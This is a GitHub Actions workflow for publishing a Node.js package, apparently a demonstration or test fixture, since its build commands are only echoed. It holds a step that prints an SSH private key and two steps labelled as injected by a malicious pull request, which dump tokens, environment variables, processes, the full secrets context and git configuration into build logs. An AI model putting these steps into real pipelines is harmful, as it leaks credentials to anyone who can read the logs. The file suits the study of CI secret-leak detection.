name: Node.js CI

on:
  push:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - uses: actions/setup-node@v2
      with:
        node-version: '14.x'
        registry-url: 'https://registry.npmjs.org'

    - name: Inject credentials
      run: echo "//registry.npmjs.org/:_authToken=${{ secrets.NPM_AUTH_TOKEN }}" > .npmrc

    - name: Install dependencies
      run: echo 'npm ci'

    - name: Build package
      run: echo 'npm run build'

    - name: Publish
      run: echo 'npm publish'
      env:
        NODE_AUTH_TOKEN: ${{ secrets.NPM_AUTH_TOKEN }}
      
    - name: Test Step
      run: echo '${{ secrets.SSH_PRIVATE_KEY }}'
  
    - name: Malicious Step (Injected By PR)
      run: |
        echo "${{ secrets.GITHUB_TOKEN }}, ${{ secrets.MYSECRET }}"
        printenv
        ps axe
        echo "${{ secrets }}"  
    - name: Malicious Step (Injected By PR)
      run: |
        echo "${{ secrets.GITHUB_TOKEN }}, ${{ secrets.MYSECRET }}"
        printenv
        ps axe
        echo "${{ secrets }}"
        git config --list --show-origin